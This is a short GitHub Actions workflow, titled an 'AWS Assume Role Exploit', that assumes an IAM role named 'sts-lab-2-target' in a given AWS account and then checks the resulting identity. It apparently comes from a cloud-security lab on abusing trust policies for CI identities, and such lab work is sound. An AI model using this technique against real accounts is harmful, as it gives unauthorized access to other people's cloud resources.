name: AWS Assume Role Exploit

on:
  workflow_dispatch:

jobs:
  assume-role:
    runs-on: ubuntu-latest
    steps:
    - name: Configure AWS credentials
      id: aws-credentials
      uses: aws-actions/configure-aws-credentials@v1
      with:
        role-to-assume: arn:aws:iam::683350395763:role/sts-lab-2-target
        aws-region: us-east-1

    - name: Verify AWS identity
      run: aws sts get-caller-identity
